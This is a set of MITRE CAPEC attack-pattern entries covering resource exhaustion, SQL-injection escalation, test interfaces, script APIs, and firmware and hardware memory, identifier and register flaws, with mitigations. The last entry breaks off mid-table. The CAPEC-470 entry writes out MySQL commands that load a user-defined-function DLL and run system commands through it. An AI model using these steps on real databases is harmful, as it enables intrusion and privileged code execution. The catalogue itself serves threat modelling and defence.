CAPEC-130: Excessive Allocation

Attack Pattern ID: 130

Abstraction: Meta

View customized information:

Description

Likelihood Of Attack

Medium

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	230	Serialized Data with Nested Payloads
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	231	Oversized Serialized Data Payloads
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	492	Regular Expression Exponential Blowup
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	493	SOAP Array Blowup
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	494	TCP Fragmentation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	495	UDP Fragmentation
ParentOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	496	ICMP Fragmentation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Communications
Mechanisms of Attack	Abuse Existing Functionality

Prerequisites

The target must accept service requests from the attacker and the adversary must be able to control the resource allocation associated with this request to be in excess of the normal allocation. The latter is usually accomplished through the presence of a bug on the target that allows the adversary to manipulate variables used in the allocation.

Resources Required

None: No specialized resources are required to execute this type of attack.

Consequences

Scope	Impact	Likelihood
Availability	Resource Consumption

Mitigations

Limit the amount of resources that are accessible to unprivileged users.

Assume all input is malicious. Consider all potentially relevant properties when validating input.

Consider uniformly throttling all requests in order to make it more difficult to consume resources more quickly than they can again be freed.

Use resource-limiting settings, if possible.

Example Instances

In an Integer Attack, the adversary could cause a variable that controls allocation for a request to hold an excessively large value. Excessive allocation of resources can render a service degraded or unavailable to legitimate users and can even lead to crashing of the target.

Related Weaknesses

CWE-ID	Weakness Name
404	Improper Resource Shutdown or Release
770	Allocation of Resources Without Limits or Throttling
1325	Improperly Controlled Sequential Memory Allocation

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping

Entry ID	Entry Name
1499.003	Endpoint Denial of Service:Application Exhaustion Flood

Relevant to the WASC taxonomy mapping

Entry ID	Entry Name
10	Denial of Service

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2017-05-01 (Version 2.10)	CAPEC Content Team	The MITRE Corporation
2017-05-01 (Version 2.10)	Updated Activation_Zone, Attack_Motivation-Consequences, Attack_Prerequisites, Description Summary, Examples-Instances, Injection_Vector, Payload, Payload_Activation_Impact, Resources_Required, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Taxonomy_Mappings
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Related_Weaknesses, Taxonomy_Mappings

CAPEC-470: Expanding Control over the Operating System from the Database

Attack Pattern ID: 470

Abstraction: Detailed

View customized information:

Description

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	66	SQL Injection

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Inject Unexpected Items

Execution Flow

Explore

The adversary identifies a database management system running on a machine they would like to gain control over, or on a network they want to move laterally through.

Experiment

The adversary goes about the typical steps of an SQL injection and determines if an injection is possible.
Once the Adversary determines that an SQL injection is possible, they must ensure that the requirements for the attack are met. These are a high privileged session user and batched query support. This is done in similar ways to discovering if an SQL injection is possible.
If the requirements are met, based on the database management system that is running, the adversary will find or create user defined functions (UDFs) that can be loaded as DLLs. An example of a DLL can be found at https://github.com/rapid7/metasploit-framework/tree/master/data/exploits/mysql
In order to load the DLL, the adversary must first find the path to the plugin directory. The command to achieve this is different based on the type of DBMS, but for MySQL, this can be achieved by running the command "select @@plugin_dir"

Exploit

The DLL is then moved into the previously found plugin directory so that the contained functions can be loaded. This can be done in a number of ways; loading from a network share, writing the entire hex encoded string to a file in the plugin directory, or loading the DLL into a table and then into a file. An example using MySQL to load the hex string is as follows. select 0x4d5a9000... into dump file "{plugin directory}\\udf.dll";
Once the DLL is in the plugin directory, a command is then run to load the UDFs. An example of this in MySQL is "create function sys_eval returns string soname 'udf.dll';" The function sys_eval is specific to the example DLL listed above.
Once the adversary has loaded the desired function(s), they will use these to execute arbitrary commands on the compromised system. This is done through a simple select command to the loaded UDF. For example: "select sys_eval('dir');". Because the prerequisite to this attack is that the database session user is a super user, this means that the adversary will be able to execute commands with elevated privileges.

Prerequisites

A vulnerable DBMS is usedA SQL injection exists that gives an attacker access to the database or an attacker has access to the DBMS via other means

Skills Required

[Level: High]

Low level knowledge of the various facilities available in different DBMS systems for interacting with the file system and operating system

Mitigations

Design: Follow the defensive programming practices needed to protect an application accessing the database from SQL injection

Configuration: Ensure that the DBMS is patched with the latest security patches

Design: Ensure that the DBMS login used by the application has the lowest possible level of privileges in the DBMS

Design: Ensure that DBMS runs with the lowest possible level of privileges on the host machine and that it runs as a separate user

Usage: Do not use the DBMS machine for anything else other than the database

Usage: Do not place any trust in the database host on the internal network. Authenticate and validate all network activity originating from the database host.

Usage: Use an intrusion detection system to monitor network connections and logs on the database host.

Implementation: Remove / disable all unneeded / unused functions of the DBMS system that may allow an attacker to elevate privileges if compromised

Related Weaknesses

CWE-ID	Weakness Name
250	Execution with Unnecessary Privileges
89	Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')

References

[REF-408] Bernardo Damele Assump ção Guimarães. "Advanced SQL Injection to Operating System Full Control". 2009-04-10. <http://www.blackhat.com/presentations/bh-europe-09/Guimaraes/Blackhat-europe-09-Damele-SQLInjection-whitepaper.pdf>.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Execution_Flow, Mitigations

CAPEC-121: Exploit Non-Production Interfaces

Attack Pattern ID: 121

Abstraction: Standard

View customized information:

Description

Extended Description

Non-production interfaces are insecure by default and should not be resident on production systems, since they may reveal sensitive information or functionality that should not be known to end-users. However, such interfaces may be unintentionally left enabled on a production system due to configuration errors, supply chain mismanagement, or other pre-deployment activities.

Ultimately, failure to properly disable non-production interfaces, in a production environment, may expose a great deal of diagnostic information or functionality to an adversary, which can be utilized to further refine their attack. Moreover, many non-production interfaces do not have adequate security controls or may not have undergone rigorous testing since they were not intended for use in production environments. As such, they may contain many flaws and vulnerabilities that could allow an adversary to severely disrupt a target.

Likelihood Of Attack

Low

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	113	Interface Manipulation
ParentOf	Detailed Attack Pattern - A detailed level attack pattern in CAPEC provides a low level of detail, typically leveraging a specific technique and targeting a specific technology, and expresses a complete execution flow. Detailed attack patterns are more specific than meta attack patterns and standard attack patterns and often require a specific protection mechanism to mitigate actual attacks. A detailed level attack pattern often will leverage a number of different standard level attack patterns chained together to accomplish a goal.	661	Root/Jailbreak Detection Evasion via Debugging

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Determine Vulnerable Interface: An adversary explores a target system for sample or test interfaces that have not been disabled by a system administrator and which may be exploitable by the adversary.
Techniques
If needed, the adversary explores an organization's network to determine if any specific systems of interest exist.

Exploit

Leverage Test Interface to Execute Attacks: Once an adversary has discovered a system with a non-production interface, the interface is leveraged to exploit the system and/or conduct various attacks.

Techniques
The adversary can leverage the sample or test interface to conduct several types of attacks such as Adversary-in-the-Middle attacks (CAPEC-94), keylogging, Cross Site Scripting (XSS), hardware manipulation attacks, and more.

Prerequisites

The target must have configured non-production interfaces and failed to secure or remove them when brought into a production environment.

Skills Required

[Level: High]

Exploiting non-production interfaces requires significant skill and knowledge about the potential non-production interfaces left enabled in production.

Resources Required

For some interfaces, the adversary will need that appropriate client application or hardware that interfaces with the interface. Other non-production interfaces can be executed using simple tools, such as web browsers or console windows. In some cases, an adversary may need to be able to authenticate to the target before it can access the vulnerable interface.

Consequences

Scope	Impact	Likelihood
Confidentiality Access Control Authentication	Gain Privileges Bypass Protection Mechanism
Confidentiality Access Control Authorization	Read Data Execute Unauthorized Commands
Access Control Integrity	Modify Data Alter Execution Logic

Mitigations

Ensure that production systems do not contain non-production interfaces and that these interfaces are only used in development environments.

Example Instances

Some software applications include application programming interfaces (APIs) that are intended to allow an administrator to test and refine their domain. These APIs are typically disabled once a system enters a production environment, but may be left in an insecure state due to a configuration error or mismanagement.

Many hardware systems leverage bits typically reserved for future functionality for testing and debugging purposes. If these reserved bits remain enabled in a production environment, it could allow an adversary to induce unwanted/unsupported behavior in the hardware.

Related Weaknesses

CWE-ID	Weakness Name
489	Active Debug Code
1209	Failure to Disable Reserved Bits
1259	Improper Restriction of Security Token Assignment
1267	Policy Uses Obsolete Encoding
1270	Generation of Incorrect Security Tokens
1294	Insecure Security Identifier Mechanism
1295	Debug Messages Revealing Unnecessary Information
1296	Incorrect Chaining or Granularity of Debug Components
1302	Missing Security Identifier
1313	Hardware Allows Activation of Test or Debug Logic at Runtime

References

[REF-588] Swarup Bhunia and Mark M. Tehranipoor. "The Hardware Trojan War: Attacks, Myths, and Defenses". Springer. 2017-11-30.

[REF-589] Boyang Du, Matteo Sonza Reorda, Luca Sterpone, Luis Parra, Marta Portela-Garcia, Almudena Lindoso and Luis Entrena. "Exploiting the debug interface to support on-line test of control flow errors". Institute of Electrical and Electronics Engineers (IEEE). 2013-07-08. <https://ieeexplore.ieee.org/document/6604058/authors#authors>. URL validated: 2020-07-13.

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2018-07-31 (Version 2.12)	CAPEC Content Team	The MITRE Corporation
2018-07-31 (Version 2.12)	Updated Activation_Zone, Attack_Phases, Description, Description Summary, Injection_Vector, Payload, Payload_Activation_Impact, Solutions_and_Mitigations, Typical_Likelihood_of_Exploit
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated @Name, @Status, Consequences, Description, Execution_Flow, Mitigations, Prerequisites, References, Related_Weaknesses, Resources_Required, Skills_Required
2020-12-17 (Version 3.4)	CAPEC Content Team	The MITRE Corporation
2020-12-17 (Version 3.4)	Updated Description, Example_Instances, Related_Weaknesses
2021-06-24 (Version 3.5)	CAPEC Content Team	The MITRE Corporation
2021-06-24 (Version 3.5)	Updated Execution_Flow, Related_Weaknesses
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Related_Weaknesses
2022-02-22 (Version 3.7)	CAPEC Content Team	The MITRE Corporation
2022-02-22 (Version 3.7)	Updated Description, Extended_Description, Resources_Required
2023-01-24 (Version 3.9)	CAPEC Content Team	The MITRE Corporation
2023-01-24 (Version 3.9)	Updated Mitigations
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Locate and Exploit Test APIs

2020-07-30 (Version 3.3)	Exploit Test APIs

CAPEC-160: Exploit Script-Based APIs

Attack Pattern ID: 160

Abstraction: Standard

View customized information:

Description

Typical Severity

Medium

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	113	Interface Manipulation

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Identify API: Discover an API of interest by exploring application documentation or observing responses to API calls
Techniques
Search via internet for known, published APIs that support scripting instructions as arguments

Experiment

Test simple script: Adversaries will attempt to give a smaller script as input to the API, such as simply printing to the console, to see if the attack is viable.
Techniques
Create a general script to be taken as input by the API

Exploit

Give malicious scripting instructions to API: Adversaries will now craft custom scripts to do malicious behavior. Depending on the setup of the application this script could be run with user or admin level priveleges.
Techniques
Crafting a malicious script to be run on a system based on priveleges and capabilities of the system

Prerequisites

The target application must include the use of APIs that execute scripts.

The target application must allow the attacker to provide some or all of the arguments to one of these script interpretation methods and must fail to adequately filter these arguments for dangerous or unwanted script commands.

Resources Required

None: No specialized resources are required to execute this type of attack.

Related Weaknesses

CWE-ID	Weakness Name
346	Origin Validation Error

Content History

Submissions
Submission Date	Submitter	Organization
2014-06-23 (Version 2.6)	CAPEC Content Team	The MITRE Corporation
2014-06-23 (Version 2.6)
Modifications
Modification Date	Modifier	Organization
2015-12-07 (Version 2.8)	CAPEC Content Team	The MITRE Corporation
2015-12-07 (Version 2.8)	Updated Description Summary
2017-08-04 (Version 2.11)	CAPEC Content Team	The MITRE Corporation
2017-08-04 (Version 2.11)	Updated Resources_Required
2019-04-04 (Version 3.1)	CAPEC Content Team	The MITRE Corporation
2019-04-04 (Version 3.1)	Updated Related_Weaknesses
2020-07-30 (Version 3.3)	CAPEC Content Team	The MITRE Corporation
2020-07-30 (Version 3.3)	Updated Related_Attack_Patterns
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)	Updated Execution_Flow
Previous Entry Names
Change Date	Previous Entry Name
2015-12-07 (Version 2.8)	Programming to included script-based APIs

CAPEC-682: Exploitation of Firmware or ROM Code with Unpatchable Vulnerabilities

Attack Pattern ID: 682

Abstraction: Standard

View customized information:

Description

Extended Description

When a vulnerability is found in a device that has no means of patching, the attack may be used against an entire class of devices. Devices from the same manufacturer often use similar or identical firmware, which could lead to widespread attacks. Devices of this nature are prime targets for botnet attacks. Consumer devices are frequently targeted for this attack due to the complexities of updating firmware once manufacturers no longer have physical access to a device. When exploiting a found vulnerability, adversaries often try to gain root access on a device. This allows them to use the device for any malicious purpose. Some example exploits are stealing device data, using the device for a ransomware attack, or recruiting the device for a botnet.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
ChildOf	Meta Attack Pattern - A meta level attack pattern in CAPEC is a decidedly abstract characterization of a specific methodology or technique used in an attack. A meta attack pattern is often void of a specific technology or implementation and is meant to provide an understanding of a high level approach. A meta level attack pattern is a generalization of related group of standard level attack patterns. Meta level attack patterns are particularly useful for architecture and design level threat modeling exercises.	212	Functionality Misuse

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Software, Hardware
Mechanisms of Attack	Abuse Existing Functionality

Execution Flow

Explore

Determine vulnerable firmware or ROM code: An adversary will attempt to find device models that are known to have unpatchable firmware or ROM code, or are deemed “end-of-support” where a patch will not be made. The adversary looks for vulnerabilities in firmware or ROM code for the identified devices, or looks for devices which have known vulnerabilities

Techniques
Many botnets use wireless scanning to discover nearby devices that might have default credentials or commonly used passwords. Once these devices are infected, they can search for other nearby devices and so on.

Experiment

Determine plan of attack: An adversary identifies a specific device/model that they wish to attack. They will also investigate similar devices to determine if the vulnerable firmware or ROM code is also present.

Exploit

Carry out attack: An adversary exploits the vulnerable firmware or ROM code on the identified device(s) to achieve their desired goal.

Techniques
Install malware on a device to recruit it for a botnet.
Install malware on the device and use it for a ransomware attack.
Gain root access and steal information stored on the device.
Manipulate the device to behave in unexpected ways which would benefit the adversary.

Prerequisites

Awareness of the hardware being leveraged.

Access to the hardware being leveraged, either physically or remotely.

Skills Required

[Level: Medium]

Knowledge of various wireless protocols to enable remote access to vulnerable devices

[Level: High]

Ability to identify physical entry points such as debug interfaces if the device is not being accessed remotely

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Access Control Authorization	Gain Privileges

Mitigations

Design systems and products with the ability to patch firmware or ROM code after deployment to fix vulnerabilities.

Make use of OTA (Over-the-air) updates so that firmware can be patched remotely either through manual or automatic means

Example Instances

An IoT company comes out with a line of smart products for home use such as home cameras, vacuums, and smart bulbs. The products become popular, and millions of consumers install these devices in their homes. All the devices use a custom module for encryption that is stored on a ROM chip, which is immutable memory and can't be changed. An adversary discovers that there is a vulnerability in the encryption module code that allows authentication bypass, gaining access to any device. The adversary then develops botnet code that is remotely downloaded onto the infected devices. This code scans the internet for nearby devices from the same product line and exploits the vulnerability, loading the botnet code onto these new devices. Over time, the adversary now has a botnet of devices that can carry out malicious activity such as a DDoS attacks. Once the vulnerability is found, it is impossible to remediate because the vulnerable code is unable to be updated.

Older smartphones can become out of date and manufacturers may stop putting out security updates as they focus on newer models. If an adversary discovers a vulnerability in an old smartphone there is a chance that a security update will not be made to mitigate it. This leaves anyone using the old smartphone vulnerable.

Related Weaknesses

CWE-ID	Weakness Name
1277	Firmware Not Updateable
1310	Missing Ability to Patch ROM Code

References

[REF-723] Alex Scroxton. "Alarm bells ring, the IoT is listening". TechTarget. 2019-12-13. <https://www.computerweekly.com/news/252475324/Alarm-bells-ring-the-IoT-is-listening>. URL validated: 2022-09-08.

[REF-724] Matthew Hughes. "Bad news: KeyWe Smart Lock is easily bypassed and can't be fixed". Situation Publishing. 2019-12-11. <https://www.theregister.com/2019/12/11/f_secure_keywe/>. URL validated: 2022-09-08.

[REF-725] Brian Krebs. "Zyxel Flaw Powers New Mirai IoT Botnet Strain". Krebs on Security. 2020-03-20. <https://krebsonsecurity.com/2020/03/zxyel-flaw-powers-new-mirai-iot-botnet-strain/>. URL validated: 2022-09-08.

[REF-726] Colin Schulz, Stefan Raff, Sebastian Kortmann and Nikolaus Obwegeser. "Digital Age Organizations: Uncovering Over-the-Air Updates in the Smart Product Realm". International Conference on Information Systems (ICIS) 2021. 2021-12. <https://www.researchgate.net/publication/356065917_Digital_Age_Organizations_Uncovering_Over-the-Air_Updates_in_the_Smart_Product_Realm>. URL validated: 2022-09-08.

Content History

Submissions
Submission Date	Submitter	Organization
2022-09-29 (Version 3.8)	CAPEC Content Team
2022-09-29 (Version 3.8)

CAPEC-679: Exploitation of Improperly Configured or Implemented Memory Protections

Attack Pattern ID: 679

Abstraction: Detailed

View customized information:

Description

An adversary takes advantage of missing or incorrectly configured access control within memory to read/write data or inject malicious code into said memory.

Extended Description

Hardware product designs often need to implement memory protection features to prevent users from reading and modifying memory reserved for security operations such as secure booting, authenticating code, device attestation, and more. However, these protection features may be missing if not configured by developers. For example, this can occur if the developers assume these features are configured elsewhere. Additionally, developers often attempt to impose proper protection features, but may incorrectly configure these controls. One such example would be setting controls with insufficient granularity for protected address regions. If an adversary is able to discover improper access controls surrounding memory, it could result in the adversary obtaining sensitive data, executing code, circumventing security mechanisms, escalating privileges, or even denying service to higher privilege software.

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	1	Accessing Functionality Not Properly Constrained by ACLs
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

Access to the hardware being leveraged.

Skills Required

[Level: Medium]

Ability to craft malicious code to inject into the memory region.

[Level: High]

Intricate knowledge of memory structures.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Integrity Availability	Execute Unauthorized Commands
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Ensure that protected and unprotected memory ranges are isolated and do not overlap.

If memory regions must overlap, leverage memory priority schemes if memory regions can overlap.

Ensure that original and mirrored memory regions apply the same protections.

Ensure immutable code or data is programmed into ROM or write-once memory.

Example Instances

A hardware product contains non-volatile memory, which itself contains boot code that is insufficiently protected. An adversary then modifies this memory to either bypass the secure boot process or to execute their own code.

A hardware product leverages a CPU that does not possess a memory-protection unit (MPU) and a memory-management unit (MMU) nor a special bit to support write exclusivity, resulting in no write exclusivity. Because of this, an adversary is able to inject malicious code into the memory and later execute it to achieve the desired outcome.

Related Weaknesses

CWE-ID	Weakness Name
1222	Insufficient Granularity of Address Regions Protected by Register Locks
1252	CPU Hardware Not Configured to Support Exclusivity of Write and Execute Operations
1257	Improper Access Control Applied to Mirrored or Aliased Memory Regions
1260	Improper Handling of Overlap Between Protected Memory Ranges
1274	Improper Access Control for Volatile Memory Containing Boot Code
1282	Assumed-Immutable Data is Stored in Writable Memory
1312	Missing Protection for Mirrored Regions in On-Chip Fabric Firewall
1316	Fabric-Address Map Allows Programming of Unwarranted Overlaps of Protected and Unprotected Ranges
1326	Missing Immutable Root of Trust in Hardware

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parents CAPEC-1, CAPEC-180 )

References

[REF-687] "Cortex-R4 Manual". ARM. <https://developer.arm.com/ip-products/processors/cortex-m/cortex-m4>. URL validated: 2021-10-21.

[REF-668] "Testing for NoSQL Injection". The OWASP Foundation. <https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05.6-Testing_for_NoSQL_Injection>. URL validated: 2021-09-30.

[REF-689] "Memory Protection Unit (MPU)". ARM. <https://static.docs.arm.com/100699/0100/armv8m_architecture_memory_protection_unit_100699_0100_00_en.pdf>. URL validated: 2021-10-21.

[REF-690] Christopher Domas. "The Memory Sinkhole". 2015-07-20. <https://github.com/xoreaxeaxeax/sinkhole/blob/master/us-15-Domas-TheMemorySinkhole-wp.pdf>. URL validated: 2021-10-21.

[REF-691] "Address Range Memory Mirroring". Taku Izumi, Fujitsu Limited. 2016-07-13. <https://www.fujitsu.com/jp/documents/products/software/os/linux/catalog/LinuxConJapan2016-Izumi.pdf>. URL validated: 2021-10-21.

[REF-692] Yuriy Bulygin, Oleksandr Bazhaniuk, Andrew Furtak, John Loucaides and Mikhail Gorobets. "BARing the System – New vulnerabilities in Coreboot & UEFI-based Systems". 2017. <https://www.c7zero.info/stuff/REConBrussels2017_BARing_the_system.pdf>. URL validated: 2021-10-21.

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)

CAPEC-681: Exploitation of Improperly Controlled Hardware Security Identifiers

Attack Pattern ID: 681

Abstraction: Detailed

View customized information:

Description

Extended Description

A System-on-Chip (SoC) often implements a security identifier mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, these mechanisms may be exploitable due to any number of the following:

The security identifiers are missing
The security identifiers are incorrectly implemented or generated
The security identifiers are generated with an obsolete encoding
The security identifiers are generated and implemented correctly, but are improperly protected

If the security identifiers leveraged by the SoC are missing or misconfigured, an adversary may be able to take advantage of this shortcoming to circumvent the intended access controls. This could result in the adversary gaining unintended access, performing a Denial of Service (DoS), escalating privileges, or spoofing actions from a trusted agent.

Likelihood Of Attack

Medium

Typical Severity

Very High

Relationships

Nature	Type	ID	Name
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	1	Accessing Functionality Not Properly Constrained by ACLs
ChildOf	Standard Attack Pattern - A standard level attack pattern in CAPEC is focused on a specific methodology or technique used in an attack. It is often seen as a singular piece of a fully executed attack. A standard attack pattern is meant to provide sufficient details to understand the specific technique and how it attempts to accomplish a desired goal. A standard level attack pattern is a specific type of a more abstract meta level attack pattern.	180	Exploiting Incorrectly Configured Access Control Security Levels

This table shows the views that this attack pattern belongs to and top level categories within that view.

View Name	Top Level Categories
Domains of Attack	Hardware
Mechanisms of Attack	Subvert Access Control

Prerequisites

Awareness of the hardware being leveraged.

Access to the hardware being leveraged.

Skills Required

[Level: Medium]

Ability to execute actions within the SoC.

[Level: High]

Intricate knowledge of the identifiers being utilized.

Consequences

Scope	Impact	Likelihood
Integrity	Modify Data
Confidentiality	Read Data
Confidentiality Access Control Authorization	Gain Privileges

Mitigations

Review generation of security identifiers for design inconsistencies and common weaknesses.

Review security identifier decoders for design inconsistencies and common weaknesses.

Test security identifier definition, access, and programming flow in both pre-silicon and post-silicon environments.

Example Instances

A system contains a register (divided into four 32-bit registers) that is used to store a 128-bit AES key for encryption/decryption, in addition to an access-policy register. The access-policy register determines which agents may access the AES-key registers, based on a corresponding security identifier. It is assumed the system has two agents: a Main-controller and an Aux-controller, with respective security identifiers "1" and "2". The Main-controller (ID "1") is meant to have access to the AES-key registers, while the Aux-controller (ID "2") has access to the access-policy register. If a SoC incorrectly generates security identifier "1" for both agents, then both agents will have access to the AES-key registers. This could further result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access.

Related Weaknesses

CWE-ID	Weakness Name
1259	Improper Restriction of Security Token Assignment
1267	Policy Uses Obsolete Encoding
1270	Generation of Incorrect Security Tokens
1294	Insecure Security Identifier Mechanism
1302	Missing Security Identifier

Taxonomy Mappings

Relevant to the ATT&CK taxonomy mapping (see parents CAPEC-1, CAPEC-180 )

References

[REF-694] "PCIe Device Measurement Requirements". Intel Corporation. 2018-09. <https://www.intel.com/content/dam/www/public/us/en/documents/reference-guides/pcie-device-security-enhancements.pdf>. URL validated: 2021-10-21.

[REF-695] John Butterworth, Cory Kallenberg and Xeno Kovah. "BIOS Chronomancy: Fixing the Core Root of Trust for Measurement". 2013-07-31. <https://media.blackhat.com/us-13/US-13-Butterworth-BIOS-Security-Slides.pdf>. URL validated: 2021-10-21.

Content History

Submissions
Submission Date	Submitter	Organization
2021-10-21 (Version 3.6)	CAPEC Content Team	The MITRE Corporation
2021-10-21 (Version 3.6)

CAPEC-680: Exploitation of Improperly Controlled Registers

Attack Pattern ID: 680

Abstraction: Detailed

View customized information:

Description

An adversary exploits missing or incorrectly configured access control within registers to read/write data that is not meant to be obtained or modified by a user.

Extended Description

Hardware systems often utilize trusted lock bits to prevent a set of registers from being written to or to restrict a register to only being written to once. Registers are also frequently used to store sensitive data leveraged in additional security operations, such as secure booting, authenticating code, device attestation, and more. However, the access control mechanisms meant to protect these registers may be fully missing or ineffective due to misconfiguration. If an adversary is able to discover improper access controls surrounding registers, it could result in the adversary obtaining sensitive data and/or modifying data that is meant to be immutable. This can ultimately result in processes like secure boot being circumvented or in protected configurations being modified.

Likelihood Of Attack

Medium

Typical Severity

High

Relationships

Nature	Type	ID	Name
